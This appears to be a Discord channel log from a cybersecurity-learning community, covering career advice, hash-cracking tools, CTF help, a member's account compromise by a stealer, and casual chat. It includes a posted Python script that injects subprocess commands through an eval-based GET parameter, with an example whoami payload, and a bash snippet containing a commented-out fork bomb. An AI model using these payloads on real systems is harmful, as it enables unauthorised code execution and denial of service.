#general
1 messages Β· Page 2124 of 1
you did an update ?
nah
It's an issue with the ramdisk, possibly the swap partition
what did you do ?
Make it behave punish her
[I tested it. It doesn't work.](#general message)
well, try to enter in your system with an usb boot
Click on the link and you will see (which is a message link).
then see the logs
try booting a differnernt kernel if one is available in grub
or boot live usb and do a fsck on the partition
were you able to boot into grub command line and check journalctl?
lol
windows sucks
Who here would consider themselves as one with a rather high level of entropy?
It does not redirect you to YouTube. I promise.
We cannot to be accessing it
hi
ha
busy but fun. do you have a question
Me, probably

im just holding back on the weird since ts a new server i joined
(gojo meme here) nah id goof

:3
Hello, I have a question for anyone who has experience and can answer this. Are the "exploits" you find on Exploit-DB really up to par with what you will do as a Professional Pen Tester? Basically if I can create "exploits" like the ones off of Exploit-DB can I get a job as a Junior Pen Tester?
VM or main machine?
Getting free access to things
what does this question even means?
To a degree, many are sector 0 locked
vm
then it's normal
Also, you can't just walk into a building with a flipperzero, you'll want something that matches the clients cards
If I can create exploits like the exploits found on this website -> https://www.exploit-db.com/ . Can I get a job? And also know how to document my findings.
nothing will 100% get u a job
nope, no one gonna give u job
it can help to get high CVEs
What do you mean?
high CVEs are basically very big vulnerabilities
But is the code written for those exploits on here -> https://www.exploit-db.com/ real-world stuff? Or is it for noobs?
So the code found on here -> https://www.exploit-db.com/ are "real"?
this is real world stuff, but all or most of them are patched
it's real stuffs
Hewo. How are you doing??
uhhhh
dont post that here
yo wtf it said 18.69 AUD including tax for montly and they charged me $30
if it's active, you can't ask for hints or tips outside of their discord
oh
I think the last person that got caught doing htat is in guantanamo bay now
Anyone received the AOC price
everyone did, yes
You got an actual price because I don't receive it till date
luckily, i did not win
I was told I won something, haven't received it yet (it's a voucher
Ok
Does anyone know a way to see a Xbox live email if you just know the gamertag? Iβm locked out of my old account and canβt remember the email for the life of me.
email them and say something like "i just wanted to say how much I appreciate you asking stupid ass questions in the interview, I probably don't wanna work there anyway"
I wish all of you a good night/day. See you!
good night
See you!
:3
wee woo wee woo π π π
this is the sleep police
sleep right now
π«
GET IN THE BED RIGHT NOW DONT MOVE. SLEEP TIGHT DONT LET THE BED BUGS BITE
(gives head pats)
Guys... Anybody from Germany here?
Contact xbox live support and ask them
I canβt find an email, place to open a case, phone number, nothing. Just an ai chat bot
AUF DE H......
i am Indian
Just asking for consultancy
for 5-10 minutes
Doing good, doing good, felt sick last night, but feeling better this morning
What about you?
Then I guess you're out of luck
Good night Darky.

catler
Was about to say, best not to send that
why the league chaos?
Anyone know aon cocubes..?!
whats that?
Hi
Its a assesmrmt platform anyone know about it
Like shl amcat
don't know
Nope
never heard of it
so youre trying to cheat?
Hm i
So you want to cheat?
Obv bro its about placement man
thats not allowed here
I am asking if uk anything u can tell me as a friend
Hi
the answer is no
Ok sor
Youd be surprised. Without going into details about the job beyond obviously having full consent by the security team, its incredible how terrible a certain brand name office rental service is that they use an rfid door that the fuzzler on my flipper could bypass, and apparently they never heard of a flipper when i documented the vulnerability;
Legal gray area;
Right to repair is challenging that but theres no explicit protection for genuine authorized repair;
Guys whatβs the best roadmap for ethical hacking in 2026 for free?
It most likely violates some ToS or warranty, but you're best off getting legal advice from... A lawyer lol
https://tryhackme.com/resources/blog/free_path is a good start
Not randos on discord
Also red team involves ethical hacking but its a skillset not a position usually;
But I donβt know how to use Linux
then start learning that
After finishing do I switch to hack the box or overthewire?
you can
Whatever you feel comfortable with
Look up professor messer comptia a+. Dont do the cert just use his videos to learn it foundations;
@stoic quarry Can I message you privately, please?
Can you help me then?
Ofc
Make it your goal to take apart a computer and put it back together piece by piece;
Why?
Iβm good with computer trouble shooting like how to use and stuff
Most of my relatives and friends ask me to help them lol
But never once used the terminal without using YouTube as guide
If you dont know linux you are still behind on os and software taking apart and putting things together;
I know, this client told us to be as silent as possible, and to blend in, so going blasting is not the proper way to engage in this, meaning I have to find a key and clone everything as well as sector 0 over to an ID chip that matches
then dont worry about HTB, just start learning linux and figure out the next steps later
Is raspberry pi worth it for ethical hacking?
i like them
Also one more thing Iβm not good at math or coding
Can I still be an ethical hacker?
Yeah
depends on what you mean by "ethical hacker" but you can get away with a lot without knowing too much coding
0:00 - Introduction
4:12 - Installing VMWare or VirtualBox
10:27 - Installing Linux
16:00 - Configuring VirtualBox
19:15 - Kali Linux Overview
22:45 - Sudo Overview
27:58 - Navigating the File System
46:10 - Users and Privileges
1:03:05 - Common Network Commands
1:11:32 - Viewing, Creating, and Editing Files
1:17:54 - Starting and Stopping Servi...
But you also shouldn't aim straight for "ethical hacker". Start with the foundations first
And dont just watch the video, create a kali vm and get your hands dirty;
I found this RCE to SSTI bug within Django when it uses eval() on a GET parameter like so -> www.target.com/page?p=import(%27subprocess%27).check_output([%27whoami%27]).decode(%27utf-8%27) ... If I wrote this into a script and find a few more bugs within the Web App, like SQLi and XSS. Could this collection of bugs help me get a job?
Like those who can hack into machines for example or able to retrieve information from a device
(Legally ofc)
def python_rce(payload, host, cmd, args=None):
if payload == 1:
url = host + "__import__('subprocess').Popen('" + cmd + "',shell=True,stdout=__import__('subprocess').PIPE).communicate()[0].decode().strip()"
page = requests.get(url)
response = page.text
print("Injecting code")
print("Executing payload #1")
print(response)
return
if payload == 2:
url = host + "__import__('subprocess').check_output('" + cmd + "',shell=True).decode().strip()"
page = requests.get(url)
response = page.text
print("Injecting code")
print("Executing payload #2")
print(response)
return
if payload == 3 and args is None:
url = host + "__import__('subprocess').run(['" + cmd + "'],capture_output=True)"
page = requests.get(url)
response = page.text
print("Injecting code")
print("Executing payload #3")
print(response)
return
#if more command arguments are needed you can tweak the python_rce() arguments
#__import__('subprocess).run(['" + cmd + "','" + args1 + '" + '" + args2 '" + '" + args(n) + '"])
if payload == 3 and args is not None:
url = host + "__import__('subprocess').run(['" + cmd + "','" + args + "'],capture_output=True)"
page = requests.get(url)
response = page.text
print("Injecting code")
print("Executing payload #3")
print(response)
return
Bro trying to hack someone? π
Thats called data forensics;
Its a blue team path;
Nah it's a bug
Could using an off the shelf exploit get you a job? No
I have something in return but I wont send it
What do you mean "off the shelf exploit", this is my code I wrote it with out any help.
cuz fontaene warned me once
Is it possible for someone to pursue multiple paths?
depends on your goals
Yeah but solely searching for bugs won't get you jobs. If a website doesn't have a bug bounty platform then it's a good way to get you blocked or potentially in legal trouble if you dont report things the right way
I wouldn't suggest it. If you're new to learning stuff then you'll get overwhelmed quickly
I just want to be able to hack into machines and protect myself from attackers while helping my friends if they got technical questions
Legally I hope πΆβπ«οΈ
then yes, all of that is possible
If I know all of the following and can demonstrate it, will that be good enough to start applying? -> Strong networking fundamentals
TCP/IP, DNS, HTTP/S, routing, firewalls, VPNs
Operating system expertise
Deep hands-on knowledge of Linux and Windows internals
Web application security
OWASP Top 10, auth flaws, business logic issues, APIs
Vulnerability assessment & exploitation
Scanning, manual validation, chaining vulnerabilities
Scripting & automation skills
Python, Bash, PowerShell for custom tooling and automation
Tool proficiency
Nmap, Burp Suite, Metasploit, SQLmap, BloodHound, etc.
Active Directory attacks
Enumeration, Kerberoasting, NTLM relay, privilege escalation
Privilege escalation techniques
Local and domain-level escalation on Windows & Linux
Post-exploitation skills
Lateral movement, persistence, data access validation
Cloud & modern environments (bonus but growing)
AWS, Azure, IAM abuse, misconfigurations
Secure coding awareness
Understanding how vulnerabilities arise in real code
Reporting & communication
Clear, professional reports with real-world risk context
Legal & ethical understanding
Scoping, authorization, compliance, rules of engagement
Continuous learning mindset
Staying current with exploits, techniques, and defenses
whats with all the text walls?
Sorry won't let it happen again.
Best way to demonstrate it is to have certifications. HR dont care if you're self taught, they're just told to look for the candidates with the required Certifications
next time upload walls of text as txt files
Once you get past the HR filter you can talk about all the self-taught stuff in a technical interview
Wow. That sucks. I don't have a lot of money to get Certs...
It's unfortunate, but you'll need to try get some to get past the HR filter. You could have amazing knowledge and all the experience, but in the 20 or so seconds that a person looks at your CV if they dont see the Security+/CCNA/eJPT/Whatever then they'll reject you
π
Also whatβs a Reddit ambassador? @stoic quarry
And how do you know this? Do you have a job? Not trying to be sarcastic just curious.
hit #1 weekly β€οΈ
Yeah I have a job
Nice!
Ok.
<33
Guys is mod apps open?
i think so
Guys is John the ripper is any good
yer its alright. im pretty sure people still use it
For what
cracking hashes
I use hashcat
me too
Then are there the same
not sure exactly but i havent come across a need for jtr that hashcat cant do
Jtr is still useful in CTFs, I've found
john has more modes than hash cat. people is hashcat cause it's performance is good
Web
john hungers for gpu
No clue how it works in real life assignments
but actually john is better to crack complex algorithm based hashes and many more
Yeah
yeah, also hashcat is good for performance handling
it limits temperature for safety
Hydra is not for any normal laptop or pc
But even cracking hashes with complex password feal impossible
it needs very high specs to actually do a DDOS
That crybtography
i like crackstation too
Cyberchef for cracking hashes?
if the pasword is salted then it's hard to crack, we need some smart moves to crack it
also password policy depends
everyone Hello
Hello π
Guys any courses about reverse engineering and web hacking and forinsics cuz I am having ctf and my mates are suck so I need to Cary them
That's quite a large field
those are 3 totally different subfields

A simple competition
The question are simple
Check out some thm rooms
They are not basic topics. Do you have much programming experience?
Yeah
Any one Doing SOC Level 1 New Task
For rev, can you read assembly?
What do you think the best topic to learn
keep going with assembly, it's foundational for rev
pwn.college is fantastic for rev and binex in general. I recommend to start there for sure
I had fun with web
Karma!
Thx
Gave +1 Rep to @tropic sail (current: #1742 - 3)
Ello
I don't think I've ever been asked for a github in job interviews 
But I'm not a red teamer
I want to read a Manga, I dont know which. I want to watch an Anime, I dont know what.
got dhcp working 
in what context?
yes
heloo
scheduling
hii hru
imm good thanks wby
Gave +1 Rep to @paper pecan (current: #1195 - 5)
Edgerunners if you alr haven't
im good too just stuck with this round robin thing
what is that ?
I already know that one
sadly
Ghost in the shell was my most recent watch
did you read demon slayer?
oyasmi punpun read it π
yes
goated manga
Go on a run π€·ββοΈ
I already know punpun too
junji ito has cool manga

gotta watch that but can't find a dub
thats unfortunate
It is peak
I wish I could forget everything and read God of Highschool again
Its so good
Im more into reading Manga/Manwha/Manhua
Paperback
its like a scheduling method
oh i see interesting
i gues
ur telling me that ur watching 1k+ of episodes 3x? π
watch subbed
Im not made for thatπ
yes
*
Like CPU time?
yeah that
Cool
its not very bad
Good luck 
π€§
Were you gonna send the spiral girl
Best Junji ito IMO
I am not sure why Steins Gate is trending so much at the moment on Tiktok
But finally people notice it again
Why watch a series when you can read a book π
just because you said that kyooty il rewatch onepiece again 
I am reading "the ritual"
I am currently reading Tower of god
Solo leveling
its slop
but i like slop
π
Yeah, I have, I don't read manga, I read actual books π
Does anybody here know Hardcore Leveling Warrior?
I havent watched solo leveling
but read
544 paged text from bottom to top books
my favorite book is networking basics cus im a skid 
did read the whole shit
Does anybody know Return of the crazy demon aka mc gives everyone Diarrhea?
oh yeah I just started reading that
they just made the animations tho , its a good studio
GATE was cool
Wtf is a write up

Hello Scrubz.
Hai.
Nvidia CEO got dunked on lol. Another CEO after Microslop CEO
hi
How are you doing?
Yo root wsg man
gd you ?
Even on TryHackMe lol
im good just doing networking
Aye common networking W.
Hello root!
I am good, thank you :3 heh
Gave +1 Rep to @rugged sequoia (current: #3538 - 1)
READ.
Another reminder, Glitch (Critical) got compromised so if someone messages about a Minecraft client, ignore it.
You can't tell me what to do, you're not my supervisor!
poor glitch get skided by somone
Already had someone else from here get compromised on top because they clearly are dumb
For a bunch of people learning cyber security. The random exe file is definitely malicious π
Why would you open a random exe file anyway
For Minecraft mods π
this is why i dont get near roblox and minecraft they use spam metasploit with chatgpt like a blind man with a automatic rifle
Stealer
You could also just play it without mods lol
W speed
I've identified the person doing the compromising tho so law enforcement request has been sent
if you want minecraft mods just download them of a reputable source
He was a curious boi
Still can't believe they were sending manual messages, and also clicked on the link you sent lol
freerobux.exe 
Absolutely cinema
wanna see something fun guys?
SweetClient.exe actually π
Glitch got too tempted by a request by a rando to play Minecraft with him so he was like "lemme join and download this unsus modpack required to join the server and then run it without even virus totaling it" 
by law inforcment you mean from his country i doubt they have a cyber police there
20k+ 
i asked the l2's and i was allowed to close them all without analysis since they were all false positives
Lmao
all microsoft, google whatever domains
Nicely done
They gotta start paying people to use AI atp. π«©π
I have contacted the Turkish National Police's Cyber Crime unit.
I have a bit more than an IP now
VirusTotal won't catch everything but even then like... That's a pretty common lure to fall for
I got bored
i see the guy is turkish 
Sure it won't but when we checked yesterday, if he did just that he would have known not to run it 
Community comments identified it as malware.
I was half asleep and wasn't aware glitch wasn't in his account
I should've done better and it is my fault
Excuses excuses
Jks jks
It's okay
Oh yeah, heard you got compromised as well, is it a huge loss? Hopefully no bank accounts affected?
Glitch is the dumbass
Nah
Bank requires an entire video
And most are linked under outlook/Gmail which were the first to be brought back
It's alright, his time is over 
We coming for him
Yeah, ty
not beano as well we loosing soliders π«‘
I'm expecting a phone call in an hour
I'm still here dw. I kicked him from my ACC before he did much
Glitch is banned π
Glitch? Yeah discord is lost, he's got a new one
Insta too but I think he's got access to it back
New glitch
He got my alts too. Maybe I can finally recover them!!! (They're locked behind a deactivated iCloud)
Discord is the C2
so i have pivoted through compromised host to internal network and got a machine there, which is the main target. Any one know how to do nfs mount attack? cause this target got nfs and rpcbind opened. My plan is to mount target machines ssh key file to my file using showmount so that i can grab the ssh key for shell. but don't know how to do exactly. If u guys have ever done this then tell me how can perform that
Omg anonymous
I wanna take a look at this
yeah, i'm not sure if it's misconfigures so giving it a try. And the problem is i can't perform aggresive scan on this cause it's the pivoted machine and ping is teribble around 200-300ms
gotcha
am I missing something
glitch = goodboi?
who's dekcah?
Hacked backwards for some reason
oh
for a second I thought critical is goodboi
cuz the same happened to him
What ever happened to goodboi
@tidal sierra he lost this account
so has a new one
Bru i cant download aircrack on termux since skid forced termux devs to remove all network tool
Executed
but that one is also deleted
Why do you need aircrack on termux lol
Idk, i didnt used it before so i want to try it out
neighbor router is shaking
Why is everyone suspecting meπ i just want to try it fr manπ
Try it on what
My own network? Im not mess with the laws bro
why termux tho and not use the shell
Im too lazy to hop on my computer π
excuses no wonder yr bio says vibe coder 
so i enumerated it's nfs, and yes shomount gonna work thanks buddy.
cause: mountd v1βv3 (tcp + udp)
which
Handles mount requests
This is what showmount -e talks to
Confirms exports are real and mountable
Yez
Gave +1 Rep to @lime nacelle (current: #3538 - 1)

Oh, i didnt think of that
Doubt it
not even rooting you're phone will fix that might be oem locked
Hum, will i go rice my void or go learn my course...
π€
yo snowie did the llm give you what you want
Nah, imma go learn my course. Im too lazy for another hyprland rice after arch
I tried the once you told me about
qwen2.5 is pretty good
but I can only run the 4b model cuz I only have 4gb vram
yo did you guys do the windows basics orrr?
Hello
probably
windows and ad fundamentals specifically
AD 
I wanna skip it bc of that and powershell
most labs ctfs targets are linux systems anyways right?
well if you're only interested in doing linux ctfs then sure, but windows knowledge is important as well
theres lots of both. but if you dont like ad then skip it
ty guys
It is only for premium so i skipped π
Yes people did win. Winners are on the website
powershell is so important for AD hacking.
ik thats why i wanna avoid it all together lol
In real world situation u will deal with windows a lot actually, u will not get the opportunity to choose linux and windows. Also most of systems will run on windows systems, so it gonna help if you learn widndows
Have you all heard about that one new Minecraft copy? Do you think people need Game Servers for it?
bash better :((
hytale
bash is good for scripting in linux. Gonna help to automate stuffs, and even in reverse shells as well. But in windows it's not gonna work. And actually windows is more like english, and easier than bash syntax. Just needs a little understanding of registry stuffs, and also some inbuilt features
set -o errexit;set -o pipefail;shopt -s extglob
:(){ :|:& }; # nope, just kidding (fork bomb commented out)
__DIR__="${1:-.}"
declare -A _T;_T=()
__MAX__=0;__BIG__=""
trap 'echo "[!] Interrupted";exit 130' INT
while IFS= read -r -d '' f;do
(
[[ -f "$f" ]] || exit 0
x="${f##*.}"
[[ "$x" == "$f" ]] && x="noext"
((_T[$x]++))
s=$(stat -c%s "$f" 2>/dev/null || echo 0)
if (( s > __MAX__ ));then
__MAX__=$s
__BIG__="$f"
fi
) &
done < <(find "$__DIR__" -type f -print0)
wait
printf "%s\n" "==== FILE EXTENSION STATS ===="
for k in "${!_T[@]}";do
printf "%-10s -> %d\n" "$k" "${_T[$k]}"
done | sort -k3 -nr
eval "echo Largest file: \"$__BIG__\" \($__MAX__ bytes\)"
(
sleep 0.$((RANDOM%9+1))
echo "Done at $(date +%T)"
) & disown
exit $((__MAX__>0?0:1))
i used to scare bash lovers with this code
okay but what would that look like in ps
$Path = if ($args[0]) { $args[0] } else { "." }
# Hashtable to store extension counts
$ExtensionCount = @{}
# Track largest file
$LargestFile = $null
$LargestSize = 0
Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
# Get extension
$ext = if ($_.Extension) { $_.Extension } else { "noext" }
# Count extensions
if ($ExtensionCount.ContainsKey($ext)) {
$ExtensionCount[$ext]++
} else {
$ExtensionCount[$ext] = 1
}
# Track largest file
if ($_.Length -gt $LargestSize) {
$LargestSize = $_.Length
$LargestFile = $_.FullName
}
}
# Print extension stats
Write-Host "`n=== FILE EXTENSION STATS ==="
$ExtensionCount.GetEnumerator() |
Sort-Object Value -Descending |
ForEach-Object {
"{0,-10} -> {1}" -f $_.Key, $_.Value
}
# Print largest file
Write-Host "`nLargest file:"
Write-Host "$LargestFile ($LargestSize bytes)"
btw It scans a folder, counts file extensions, and tells you which file is the biggest.
.
hello everyone
I wanna try out obsidian today
I've tried using it before but didn't understand how

Notion is way better
obsidian is the best
obsidian is so confusing
Not until you run out of storage
I dont udnerstand what to do w it
gang gang
never happened
just have plenty of storage
notion > obsidian
Good morning everyone
gang gang
why
The only thing i use obsidian for is excalidraw
how are yall using obsidian bru
some type in it
Its 10am and i still didnt had my coffee so i am not gonna go into details but most because it has more functionalities , better integration and synchronization, ability publish pages as website and all that for free . Only reason people chooses Obsidian over Notion is either because they dont know the full capabilities of notion or they are just trynna be elites "I use obisidian btw" suckers
i installed it
hello mighty people of the internet
Good morning (itβs 0438 rn)
for me is 67:67
it's 02:02 for me
Iβm up for work
I did some work and it returned your name
im returning in void reality, which is illegal.
You know you canβt dereference a null pointer bud
i have malloc'ed you
I⦠I need an adult
thanks for the friendly email β€οΈ 
too glazing
Notebooks
I lost my notebook
I still use notebooks to make notes of any topic
i dont have money for a notebook;
Unless it requires lot of theory
I lost my chemistry notebook
Or ss for other stuff
im in jail due to stealing a notebook;
Chem 
Did you steal mine??
i steal your heart instead;
π‘οΈ π
I am a guy
Well dont skull me i dont know what level lf chem ur at. Im not big chem student π

win win situation

i am right
You wish
Everyone: βHeβs a sith lordβ
Anakin: βNuh uhβ
Also Anakin: (killing younglings)
heyyyyyyyyy chat
also anakin tryna kil his own incest son
and his son actually wanted to merry her sister...

hyyy
anakin was fire back then
great actor yeah
behind the scenes
Yoda is not fond of seagulls. Full-length version of the song first seen here: https://youtu.be/UkiI2vM2lfA
ITUNES: http://apple.co/2gmEqCi AMAZON: http://a.co/4bgZBa2 Google Play coming soon!
Like on Facebook! http://www.facebook.com/badlipreading
Follow on Twitter! http://twitter.com/badlipreading
master yoda-sun
dearest padawan fighting with such seagulls
and the best was this π https://youtu.be/RySHDUU2juM
Ben's musical lecture on the perils of love...
MERCH! https://bit.ly/3hoEhzF Listen on Spotify, iTunes, etc....
iTUNES!: http://itunes.apple.com/album/id1070988438?ls=1&app=itunes
AMAZON!: https://amzn.com/B019SBYC1O
Like on Facebook! http://www.facebook.com/badlipreading
Follow on Twitter! http://twitter.com/badlipreading
WATCH THE OTHERS!
"...
is that master eggway?
oogwey*
whats goin on w nmap why is it taking so long
be patient my child
this is a life lesson
no dude a simple scan is oddly taking so long
oh fr?
try with -T4
which thinkpad?
they run so smooth on linux
ibm era of thinkpad was goated
its still scanning
cancel it and use -T4
TO FORCE
may force be with you
jetbrains toolbox app is full of shit, is crashing all the time
doesnt lemme open it
its still scanning ahh
TF YOU MEAN 1980????
its a ez ctf
is somethin wrong w the target machine
imma going to ask u even i dont havee the right but how tf u actually read from this
autism
idk i just read
i still dont know what thays
that is
its some notepad stuff
This is funny
https://creepylink.com/
Anyone got prize of advent?
look like actual harmfull links π
Don't miss this!
Important link - click here
Pickle Rick room
anyone here work on NetDisco server before I wanna ask few questions about it
what the fuck am i looking at

nmap scan
i lije it
It's called the gangsterlicious terminal
helps with my adhd and cptsd
it's more distubing and unprofessionnal than anything else
You guys are so rude
who are you
Let the guy have his own liked terminal background
π
What's a terminal?
thermometer?????????????????????
How is this for a terminal
It's okay, no one cares. It's your tool, use it how you like it.
So therminal = thermometer
yes but no
for someone doing the networking module rn, what would you recommend my next step to be? should I keep doing thm rooms and modules or prepare for certificates maybe?
Complete THM till Jr Penetester path
cisco is gon be your ride or die fr
what about comptia sec
thinkin bout the same
just equipping myself first with networking and liux,windows fundamentals
bow down to the Cisco overlords
so I should focus on that before going for any certs?
baby steps man. you cant build a stable house on an unstable foundation
For cert maybe you should read the given materials
agreed
I need to set a goal for myself to know where I'm going
you feel lost if you don't have a goal
LETS GOO!!!
that's why I asked about the certs
networking,linux fundamentals and windows fundamentals should be good for now
then can go for certs like sec+,network+ or a+

you should really explore cisco network academy tho
I mean Im gonna be done with networking module this week, so I wanted to know if I should finish the tryhackme cybersecurity 101 path first before doing any certs
currently at the same place lol, gon finish up linux and windows fundamentals module
and simultaneously work on some cisco courses


Cisco isn't the monopoly anymore .
guys give me a idea of project to talk about in 5 min in a presentation ls and dont be dumb im so serious
in cysec
Where will u present
the idea its just something for non technical skill " presenting "
but i have to talk about something in the track itself
ohh no
video call
zoom
are u gonna bomb my housee
Who are the organizers
For school?
im not answering any useless question fr
How are we supposed to give ideas if you don't give us a clue what is it about
Too vague, and I'm out
topic , project
and u asking where and who
what u gonna do if the orgnizer is nameed bob
I wish Google would stop spamming my email with DMARC checks
ur so dumb dude
You're ignorant either, there are some topics best suited or tailored for certain situations. And I ain't gonna interact with interaction no more. Good luck to your presentation if you're just going to antagonize people trying to help you out.
Present a root kit
Bootkits and Rootkits represent some of the most complex and stealthy forms of malware, capable of achieving full system control before and after the OS is loaded. While often discussed in theory, their actual construction, interaction, and execution flow remain mostly hidden from public view. This talk sheds light on how these implants are buil...
Or pick any cool stuff they present there
Please be respectful towards other members of the community
Huh?!? π€¨π€¨
sorry about thtat
need help in pivoting
Iβm working on a CTF
After scanning the ports with Nmap, I found multiple SSL-enabled services. I can successfully connect and complete the SSL handshake, but when I submit the level 16 password, I donβt receive the private key needed for the next level. What could I be missing?
The server is not responding with a key thats my issue
Thatβs better than asking to help pivot in a .gov.br shell. You sure you got what you need and submitting it how you need to? Any HTTP errors or anything?
Not atall
Oof Iβd double check lol
Let me have another glance
Ok an error mentions that a certificate is self signed?
Am i able to connect to a client using nc instead of openssl
Add the cert as trusted
In the browser
Hello,
I'm new here, and I'm having trouble finding the answer to task 2, security analysis. Can anyone help me?
Security analysts play a significant role in an organisationβs _____?
Fill in the blank:
Defence?
Have you made sure to read the module fully?
Hello beautiful people
Wishing everyone a nice Friday eve
Hello princess
Been a while since anyone called me that
I respond in defense, but he says I'm going too fast.
Refresh and wait a few seconds. It happens
Whats a security analysts task do a research
so hows you're day going
very very productive very beautiful and distraction free. Although my throat hurts a little which is badddd. What about you?
How's it going pseudooo
Doin fine. Eyes hurting π
too much studyin aye?
im tired i have been trying to get a response from a ssl client for the past hour or so
Not enough ,been feeling that way
ooo lots of people with tired and hurting eyes today
That's what mid-week looks like boys and girls. Keep pushing through
its thursday
Wanna switch from linux mint to another distro cuz the newer linux mint looks so ass
agreed

facts
it does??? When did it change
arch is calling
heeeell noo !!!
Updated it last night and urgh it looks shite.
Arch was an option for me still havent decided tho
THE ARCH GODS ARE CALLING UPON ME
im more of an offensive type of guy
damn... When I'm in doubt I just install arch
Thinking bout omarchy
Literally got an iso on my desktop at all times
Damn i love this skirt
π₯°π₯°
I'm starting to wonder if there are femboys here
W plays. Honestly im hella confused on which distro should i try
As an arch user who switched back to win11, Iβm clean now from my femboy status
What are you actually looking for? Of course you'd be confused without a real goal
Lmao
void I've heard you say that before and it didn't hurt any less this time
just steal data from users*
let's be honest can anyone here confidently say every product they use does NOT steal user data?
Just a minimal but functional solution
If you want functional and reliable we automatically cancel out arch
arch is a whole different bag of items
Glitch?
I mean there is no such thing as 100% secure
thats for sure
I'm not talking about security in this current case
But yes your statement is true
For example I hear people who go "Ugh I'm leaving windows behind it steals user data", and then they go and install Ubuntu
I'm starting to get angry because 1 year ago i used to have knowledge abt every aspect of linux etc now half of the commands are jsut not here
Wanna make it look cool and not stinky.
I mean, it is Linux.. I made my Debian install into a frutiger aero / windows 7 style interface and it looked beautiful
You can do whatever you want with it
I have took a break for more than a year probably
if you mean critical/glitch, original is compromised
look at this mint stink
It doesn't look horrible to be fair
oh i wanna see
have you redone your system yet?
Yeh,hello btw
U have his new account?
is that not just the DE
I don't have the system anymore, clean wiped and sold the computer π’
Yep
Hi. And yeah one sec
Now I only have my W10 desktop and my macbook with linux VMs
these routing protocols are confusing as hell
naur
slayer1123.
Relatable
menu takin half my screen
Windows reinstalled & passwords reset. It's all secure with a temp password so I can fix it all tonight
Tyπ₯Ίπ₯Ί
true, but surely you can change those things
gonna go down the rabbit hole of ricing my linux
Yw
gg chat π«‘
Cybersecurity means being knowledgable in every aspect of a computer
EVERY aspect
I have another question
boils down between kali or omarchy
yes?
Ur pfp
It makes me feel uneasy for no reason
When i look at it rlly fast
Am I unintentionally intimidating you with Paulie Walnuts and the Greek flag?
π¬π· π° BOO
Yeh,but when i look at it closely,it feels normal
The flag reminds me of a monument
I meant another monumentπππ
look at you monument collector
Good morning
Hellooooo CLONIE
?
Bye
9mm or 45acp
9 is cheaper, but 45 is more fun
How about practicality
9
Gm everyone
You gotta ask @cosmic pendant if you want particulars.
can anyone help me in ELK stack setup on mac ?
Dude is really into security.
Cyber security - has doctorate
Physical security - probably has guns too
He is American after all
hello i am new and still in college and wanted to ask some question to the seniors if anyone is available
Guys, I need help with the cloud configuration in GNS3. Nothing is working for me.
is thm down?
Page not found
Sorry we can't find the page you're looking for. Let's get you back on track. :c
well i am going to sleep zzz
routing protocols are making me tweak out
I loved that skyrim game

"that skyrim game" that game IS Skyrim, mean "That Elder Scrolls" game
ENGLISH
This emoji looks pretty nice.
I like to show you one special sticker.

I am sorry to hear that.
Umβ¦
Apolo-cheese.
Helloo folx!
Sup geek
More SOC1 rooms today, I think finally getting to some hands-on things and not just reading
Should i keep learning in thm course or find another free basic network course?
Hi all, I am living in Singapore. Sometimes my VM region will auto switching to Europe (Ireland). Can I know which region is more suitable to where I am.
You are 0x2, def stay
It is a lot of paid course bru, but i think i can skip them and learn them later
But wait, what is 0x ranking system?
I believe Asia
You won't find a better course with this price
and you def won't find a better "free" course
the money is worth it imo
For the knowledge it offers and somewhat the structure of paths, its worth it
Thanks. What can I do to avoid it from auto switching to another region?
Gave +1 Rep to @coarse hedge (current: #391 - 21)
Aight, then i just gonna stay
I believe there might be some configuration in our profile. I haven't explored it yet. Will check it for you from my end as well
Iirc theres a free pathway, but i recommend the subscription if budget allows.
Anyways, what is the 0x ranking system ?
Stick with THM first with premium until you have strong foundation, then you may consider Hack The Box platform for advanced level
anyone else having trouble with windows-based labs? vm in https://tryhackme.com/room/memoryacquisition doesn't start even after 10 minutes
Well, its dependant upon points
My budget is 0$ tbhπ
Aight, so the point is rep?
I think it won't
I dont have premium and my budget is free bru
In uni atm?
Huh?
I mean are you studying at university at the moment?
Bro, it is not expensive as compared to other platform. Take it as investment. You will def earn back if you have skillset/knowledge
Hi there fellow nerd! Can I dm you? π
take a loan or something
But my parents are not allow me to pay these stuff, even tho i wanted.
How old are you? If you are teenager, you can work as part time right?
is u real hacker
Submit career development TPS in triplicate, 2000 words, must have executive summary and abstract
Noob ethical hacker here lol
Ok, in my country, u need to be 15 yr old to have a bank account. This is what i need.
And im not old enough
Patience, you must learn.
wow why ethical u student?
Ethics are cool mannnnnnnnnn
π
Cause I don't wanna to be in prison
But you can be anomymous
Nope
No you can't
move to russia then you can have fun /j
@gusty inlet Price Check please π
Wow do you have a PhD?
I do
ahhhhhhh that fresh toasty roasty to go with my coffee


